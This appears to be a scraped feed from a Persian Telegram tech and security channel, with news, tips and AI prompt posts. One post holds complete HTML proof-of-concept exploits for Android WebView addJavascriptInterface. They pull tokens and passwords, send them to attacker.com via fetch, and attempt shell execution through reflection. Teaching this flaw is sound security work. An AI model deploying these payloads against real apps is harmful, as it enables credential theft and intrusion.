⁉️ توهمِ پاک کردن ؛ فایلی که Delete میکنی واقعاً حذف میشه؟
▪️فکر میکنی با زدن Delete یا حتی فرمت کردن، همهچی برای همیشه پاک شده؟ واقعیت اینه که تو اکثر مواقع، سیستمعامل فقط «آدرس» فایل رو حذف میکنه، نه خودِ فایل رو! تا وقتی اطلاعات جدید دقیقاً روی همون بخش نوشته نشه، فایل قبلی هنوز قابل بازیابیه 😬
▪️یعنی هرکسی با یه ابزار ریکاوری ساده میتونه عکسها، ویدیوها یا فایلهایی که فکر میکردی نابود شدن رو برگردونه ، مخصوصاً قبل از فروش لپتاپ، هارد یا گوشی.
✅ میتونی از ابزار «File Shredder» استفاده کنی؛ برنامههایی که بعد از حذف فایل، چند بار روی همون فضا داده تصادفی مینویسن تا چیزی برای برگردوندن باقی نمونه.
یکی از گزینههای رایگان و اوپنسورس تو ویندوز: BleachBit ، با گزینه Shred عملاً فایل رو پودر میکنه.
▪️برای دانلود ضربه بزنید
@ITSecurityComputer
▪️فکر میکنی با زدن Delete یا حتی فرمت کردن، همهچی برای همیشه پاک شده؟ واقعیت اینه که تو اکثر مواقع، سیستمعامل فقط «آدرس» فایل رو حذف میکنه، نه خودِ فایل رو! تا وقتی اطلاعات جدید دقیقاً روی همون بخش نوشته نشه، فایل قبلی هنوز قابل بازیابیه 😬
▪️یعنی هرکسی با یه ابزار ریکاوری ساده میتونه عکسها، ویدیوها یا فایلهایی که فکر میکردی نابود شدن رو برگردونه ، مخصوصاً قبل از فروش لپتاپ، هارد یا گوشی.
✅ میتونی از ابزار «File Shredder» استفاده کنی؛ برنامههایی که بعد از حذف فایل، چند بار روی همون فضا داده تصادفی مینویسن تا چیزی برای برگردوندن باقی نمونه.
یکی از گزینههای رایگان و اوپنسورس تو ویندوز: BleachBit ، با گزینه Shred عملاً فایل رو پودر میکنه.
▪️برای دانلود ضربه بزنید
@ITSecurityComputer
👍25❤12
دام «یارانه معیشتی» و «سهام عدالت» برای خالی کردن حسابهای بانکی
معاون اجرایی پلیس فتا:
🔹هرگونه پیام دریافتی حاوی لینک یا فایلهای ناشناس از سرشمارههای شخصی و پیامرسانها با مضامینی همچون «ابلاغیه قضایی»، «بخشنامه دولت»، «سهام عدالت» و «بهروزرسانی همراه بانک»، قطعا دامیبرای آلودهسازی گوشی و سرقت موجودی حساب بانکی است.
🔹از شهروندان تقاضا میشود ضمن بیتوجهی به این پیامهای جعلی، از کلیک کردن بر روی هرگونه لینک مشکوک خودداری کنند. /ایسنا
@ITSecurityComputer
معاون اجرایی پلیس فتا:
🔹هرگونه پیام دریافتی حاوی لینک یا فایلهای ناشناس از سرشمارههای شخصی و پیامرسانها با مضامینی همچون «ابلاغیه قضایی»، «بخشنامه دولت»، «سهام عدالت» و «بهروزرسانی همراه بانک»، قطعا دامیبرای آلودهسازی گوشی و سرقت موجودی حساب بانکی است.
🔹از شهروندان تقاضا میشود ضمن بیتوجهی به این پیامهای جعلی، از کلیک کردن بر روی هرگونه لینک مشکوک خودداری کنند. /ایسنا
@ITSecurityComputer
🤣28❤6👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🔴شرکت راکستار به صورت رسمی از کاور آرت GTA 6 رو نمایی کرد.
@ITSecurityComputer
+پیش فروش این بازیهم تقریباً از یکهفته دیگه (۴تیر | 25 June) شروع میشه.
@ITSecurityComputer
❤44🔥7👍4🤣3💔3🥴1
تکنیک مهندسی معکوس برای نوشتن پرامپتهای بینقص اگه عکسی تو اینترنت دیدید که خیلی خفن و حرفهایه و دوست دارید بدونید چه پرامپتی پشتش بوده، از خود هوش مصنوعی کمک بگیرید
کافیه تصویر رو داخل ChatGPT یا Claude آپلود کنید و این دستور رو براش بفرستید:
@ITSecurityComputer
کافیه تصویر رو داخل ChatGPT یا Claude آپلود کنید و این دستور رو براش بفرستید:
"Analyze this image in extreme detail and describe every visual element, including composition, lighting, camera angle, lens characteristics, color grading, artistic style, materials, textures, mood, atmosphere, subject details, environment, depth of field, and rendering techniques. Then generate a complete AI image-generation prompt that can recreate a highly similar image."هوش مصنوعی جزئیات پنهان تصویر رو استخراج میکنه و یک پرامپت حرفهای در اختیارتون میذاره تا بتونید تصاویر مشابه و حتی بهتر بسازید.
@ITSecurityComputer
❤30👍8🤣2
🕵️ یه سایت هست که میتونه تقریباً تمام اطلاعات عمومی یک وبسایت رو دربیاره!
🌀 فرض کن میخوای بدونی یه سایت روی چه سروری میزبانی میشه ، مال کدوم کشوره ، از چه CDN یا فایروالی استفاده میکنه ، کی ثبت شده یا حتی چه رکوردهای DNS داره...؟!
همه رو میتونی تو چند ثانیه با سایتهای پایین ببینی!
🌐 dnsdumpster.com
🌐 securitytrails.com
🤯 جالب اینجاست که بعضی وقتها از روی همین اطلاعات میشه فهمید:
▫️یه سایت واقعاً مال چه شرکتیه
▫️پشت Cloudflare قایم شده یا نه
▫️سرورهاش کجا قرار دارن
▫️قبلاً روی چه IPهایی بوده
@ITSecurityComputer
🌀 فرض کن میخوای بدونی یه سایت روی چه سروری میزبانی میشه ، مال کدوم کشوره ، از چه CDN یا فایروالی استفاده میکنه ، کی ثبت شده یا حتی چه رکوردهای DNS داره...؟!
همه رو میتونی تو چند ثانیه با سایتهای پایین ببینی!
🌐 dnsdumpster.com
🌐 securitytrails.com
🤯 جالب اینجاست که بعضی وقتها از روی همین اطلاعات میشه فهمید:
▫️یه سایت واقعاً مال چه شرکتیه
▫️پشت Cloudflare قایم شده یا نه
▫️سرورهاش کجا قرار دارن
▫️قبلاً روی چه IPهایی بوده
@ITSecurityComputer
👍17❤6🙏3
افشای ۱۲۴ میلیون پسورد و ایمیل؛ آیا اطلاعات شما هم در خطر است؟
🔹بهتازگی سرویس مشهور هشدار نشت اطلاعات «Have I Been Pwned» یا به اختصار (HIBP)، مجموعهای جدید شامل ۱۲۴ میلیون پسورد و بیش از ۵۶ میلیون آدرس ایمیل را به پایگاه داده خود اضافه کرده است.
🔹مدیر سرویس HIBP توضیح میدهد که این دادهها در واقع مجموعهای از گزارشهای ثبتشده توسط بدافزارهای سرقتکننده اطلاعات هستند. این برنامههای مخرب روی سیستمعامل ویندوز و سایر دستگاهها پنهان میشوند و پسوردهای ذخیرهشده، دادههای مرورگر، کوکیها و توکنهای دسترسی را اسکن و سرقت میکنند.
🔹برای بررسی وضعیت امنیت اطلاعات خود، میتوانید به سادگی به وبسایت HaveIBeenPwned.com مراجعه کنید. این پلتفرم اخیراً این اطلاعات جدید را به پایگاه داده خود اضافه کرده است و شما میتوانید با جستجوی ایمیل خود، وضعیت آن را به سرعت بررسی کنید.
@ITSecurityComputer
🔹بهتازگی سرویس مشهور هشدار نشت اطلاعات «Have I Been Pwned» یا به اختصار (HIBP)، مجموعهای جدید شامل ۱۲۴ میلیون پسورد و بیش از ۵۶ میلیون آدرس ایمیل را به پایگاه داده خود اضافه کرده است.
🔹مدیر سرویس HIBP توضیح میدهد که این دادهها در واقع مجموعهای از گزارشهای ثبتشده توسط بدافزارهای سرقتکننده اطلاعات هستند. این برنامههای مخرب روی سیستمعامل ویندوز و سایر دستگاهها پنهان میشوند و پسوردهای ذخیرهشده، دادههای مرورگر، کوکیها و توکنهای دسترسی را اسکن و سرقت میکنند.
🔹برای بررسی وضعیت امنیت اطلاعات خود، میتوانید به سادگی به وبسایت HaveIBeenPwned.com مراجعه کنید. این پلتفرم اخیراً این اطلاعات جدید را به پایگاه داده خود اضافه کرده است و شما میتوانید با جستجوی ایمیل خود، وضعیت آن را به سرعت بررسی کنید.
@ITSecurityComputer
❤23👍5🥰4
چرا اینترنت ایران پس از بازگشایی همچنان ناپایدار است؟
🔹با گذشت بیش از سه هفته از بازگشایی اینترنت بینالملل، کاربران همچنان با کندی، قطعیهای مکرر و اختلال در دسترسی به سرویسهای خارجی مواجهاند. بررسیهای فنی نشان میدهد مجموعهای از عوامل از جمله محدودیت در پروتکل TCP، اختلال در دیتاسنترها، مدیریت سختگیرانه ترافیک و عدم استفاده از IPv۶، در ناپایداری اینترنت
نقش دارند. /سیتنا
@ITSecurityComputer
🔹با گذشت بیش از سه هفته از بازگشایی اینترنت بینالملل، کاربران همچنان با کندی، قطعیهای مکرر و اختلال در دسترسی به سرویسهای خارجی مواجهاند. بررسیهای فنی نشان میدهد مجموعهای از عوامل از جمله محدودیت در پروتکل TCP، اختلال در دیتاسنترها، مدیریت سختگیرانه ترافیک و عدم استفاده از IPv۶، در ناپایداری اینترنت
نقش دارند. /سیتنا
@ITSecurityComputer
👍62❤9👎2
امارات متحده عربی با تصویب قانونی جدید، حداقل سن مجاز برای فعالیت در شبکههای اجتماعی را به ۱۵ سال افزایش داد
- امارات نخستین کشور عربی است که چنین محدودیتی را برای کاربران فضای مجازی اعمال میکند.
- مصوبه جدید، کودکان زیر ۱۵ سال را از ایجاد یا استفاده از حسابهای کاربری شخصی در شبکههای اجتماعی منع میکند.
- قانون مذکور همچنین دسترسی کاربران کمسنوسال به قابلیتهای کامل پلتفرمهای اجتماعی را محدود میسازد.
@ITSecurityComputer
- امارات نخستین کشور عربی است که چنین محدودیتی را برای کاربران فضای مجازی اعمال میکند.
- مصوبه جدید، کودکان زیر ۱۵ سال را از ایجاد یا استفاده از حسابهای کاربری شخصی در شبکههای اجتماعی منع میکند.
- قانون مذکور همچنین دسترسی کاربران کمسنوسال به قابلیتهای کامل پلتفرمهای اجتماعی را محدود میسازد.
@ITSecurityComputer
👍66❤30👏10🤬2🤣2🤔1
🛑هکرها به سراغ پروندههای پژوهشی Novo Nordisk رفتند؛ اطلاعات مطالعات بالینی در حمله سایبری سرقت شد
شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانههای داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کردهاند.
به گفته شرکت، دادههای سرقتشده شامل اطلاعات پژوهشی و برخی مشخصات شرکتکنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیتهای اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفتهاند.
این رخداد بار دیگر نشان میدهد دادههای پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شدهاند.
@ITSecurityComputer
شرکت داروسازی Novo Nordisk اعلام کرد در یک حمله سایبری، مهاجمان به بخشی از سامانههای داخلی این شرکت دسترسی پیدا کرده و اطلاعات مربوط به برخی مطالعات بالینی را کپی کردهاند.
به گفته شرکت، دادههای سرقتشده شامل اطلاعات پژوهشی و برخی مشخصات شرکتکنندگان مطالعات بوده، اما نام و هویت مستقیم بیماران افشا نشده است. همچنین فعالیتهای اصلی شرکت و تولید داروها تحت تأثیر این حادثه قرار نگرفتهاند.
این رخداد بار دیگر نشان میدهد دادههای پزشکی و پژوهشی به یکی از اهداف ارزشمند مهاجمان سایبری در سراسر جهان تبدیل شدهاند.
@ITSecurityComputer
❤16👍6
خنده دار به نظر میاد ولی پرامپتش :
@ITSecurityComputer
«این تصاویر مربوط به میوههایی است که قصد خرید آنها را دارم. لطفاً بهصورت دقیق و حرفهای آنها را از نظر میزان رسیدگی، تازگی، شیرینی احتمالی، کیفیت ظاهری، لکهها، لهشدگی و نشانههای خراب بودن بررسی کن.
در نهایت:
بهترین گزینه برای خرید را مشخص کن
ترتیب کیفیت از بهترین تا ضعیفترین را بنویس
دلیل انتخابت را خیلی کوتاه و واضح توضیح بده
اگر هیچکدام مناسب نیستند، صادقانه بگو و دلیلش را توضیح بده
فرض کن یک کارشناس حرفهای انتخاب میوه هستی و باید بهترین انتخاب را برای یک خرید واقعی انجام بدهی.»
@ITSecurityComputer
🍓45🤣30👍14❤3
⭕️ در زیر یک تکه کد آسیبپذیر آورده شده است:
کد اکسپلویت کامل
نسخه سادهتر (سرقت دیتا از متود های اکسپوزد)
نکته: این POC فرض میکنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.
نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!
برای مطالعه بیشتر: Owasp MASTG
@ITSecurityComputer
WebView webview = new WebView(this);
WebSettings webSettings = webview.getSettings();
webSettings.setJavaScriptEnabled(true);
webView.addJavascriptInterface(new WebAppInterface(this), "Android");
webView.loadUrl(getIntent().getStringExtra("url"));
کد اکسپلویت کامل
<!DOCTYPE html>
<html>
<head>
<title>POC - WebView addJavascriptInterface</title>
</head>
<body>
<h2> Exploiting addJavascriptInterface</h2>
<div id="result"></div>
<script>
// مرحله 1: سرقت دیتا از متدهای exposed
try {
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
document.getElementById('result').innerHTML +=
'<p>Stolen: ' + method + ' = ' + data + '</p>';
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
}
} catch(e) {}
}
} catch(e) {}
// مرحله 2: RCE (فقط در صورتی که getContext در کلاس جاوا تعریف شده باشه)
try {
var context = window.Android.getContext();
var classLoader = context.getClassLoader();
var Runtime = classLoader.loadClass('java.lang.Runtime')
.getMethod('getRuntime', null)
.invoke(null, null);
Runtime.exec(['su', '-c', 'id']);
document.getElementById('result').innerHTML += '<p> RCE Successful!</p>';
} catch(e) {
document.getElementById('result').innerHTML +=
'<p> RCE not possible (no chain method)</p>';
}
</script>
</body>
</html>
نسخه سادهتر (سرقت دیتا از متود های اکسپوزد)
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<script>
// سرقت دیتای هر متدی که در کلاس جاوا وجود داره
var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];
for (var method of methods) {
try {
var data = window.Android[method]();
if (data) {
fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));
alert('Stolen: ' + data);
}
} catch(e) {}
}
</script>
</body>
</html>
نکته: این POC فرض میکنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن.
نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!!
برای مطالعه بیشتر: Owasp MASTG
@ITSecurityComputer
👾21❤4🤯3😱3
🔴 میدل ایست آی : از هوش مصنوعی گروک متعلق به ایلان ماسک برای مشخص کردن 2000 تارگت در حملات اخیر به ایران استفاده شده
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.
@ITSecurityComputer
البته مشخص نیست که انتخاب مدرسه ی میناب به عنوان هدف هم توسط هوش مصنوعی گراک انجام شده یا نه.
@ITSecurityComputer
🤬139🤣71😱10🫡5❤2🤷♂2👍2🔥2🐳2💯1💔1
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از این ویدیو 📈📈📈
اسپویل :با این ترفند هرچی حرف بزنی رو تایپ میکنه، رایگان بدون نصب هیچی
🪽 Fachlich
🍃 @ITSecurityComputer
اسپویل :
🪽 Fachlich
🍃 @ITSecurityComputer
🤣79❤7👍5
This media is not supported in your browser
VIEW IN TELEGRAM
سهام شرکت سامسونگ بعد از اینکه مشخص میشه اصلا برای تبدیل صدا به متن نیازی به گوشی نیست : 📉📉🫨
🪽 Fachlich
🍃 @ITSecurityComputer
🪽 Fachlich
🍃 @ITSecurityComputer
🤣77❤8
دیگه برای بستن برنامههای هنگ کرده، نیازی به Task Manager نداری حتماً برای شما هم پیش اومده که وسط کار، یه برنامه توی ویندوز قفل میکنه و هیچ جوره بسته نمیشه. همیشه مجبور بودیم کلی مسیر بریم، تسک منیجر رو باز کنیم و از اونجا برنامه رو به زور ببندیم (End\ Task). اما توی ویندوز ۱۱ یه قابلیت مخفی وجود داره که این دکمه رو مستقیم میاره روی نوار پایین صفحه (Taskbar) تا فقط با یک کلیک، برنامه ای هنگ کرده رو ببندید
چطوری فعالش کنیم؟
@ITSecurityComputer
چطوری فعالش کنیم؟
کلیدهای ترکیبی Windows + I رو بزنید تا تنظیمات (Settings) باز بشه.تمام حالا هر وقت برنامهای قفل کرد، کافیه روی آیکونش در پایین صفحه راستکلیک کنید و گزینهی End Task رو بزنید.
از منوی سمت چپ وارد بخش System بشید.
بیاید پایینتر و گزینهی For Developers (یا در برخی نسخهها Advanced) رو پیدا کنید.
گزینهی End Task رو روشن (On) کنید.
@ITSecurityComputer
❤31🤣10👍8❤🔥2
🔴 جوون ایرانی با بازی کردن GTA 6 خداحافظی کن.
راکستار : هزینه دیسک بازی GTA 6 حدود 70 تا 100 دلار تخمین زده میشه، یعنی برای داشتن این دیسک باید 11 تا 16 میلیون تومن هزینه کنید.
@ITSecurityComputer
راکستار : هزینه دیسک بازی GTA 6 حدود 70 تا 100 دلار تخمین زده میشه، یعنی برای داشتن این دیسک باید 11 تا 16 میلیون تومن هزینه کنید.
@ITSecurityComputer
💔156👾16🥱8❤7👎3😴2
🔴 شاید باورتون نشه، ولی به خاطر یه تجمع ساده دانشآموزی، تو بعضی از مناطق کشور سرعت اینترنت بهشدت ضعیف شده.
@ITSecurityComputer
@ITSecurityComputer
🤣158👍10😢5😍3👎2💔2❤1
تکنولوژی،خبری،هوش مصنوعی،
🔴 شاید باورتون نشه، ولی به خاطر یه تجمع ساده دانشآموزی، تو بعضی از مناطق کشور سرعت اینترنت بهشدت ضعیف شده. @ITSecurityComputer
البته ناگفته نماند که برقمونم رفت 😐😂
🤣92💔11👍4👎2🥰1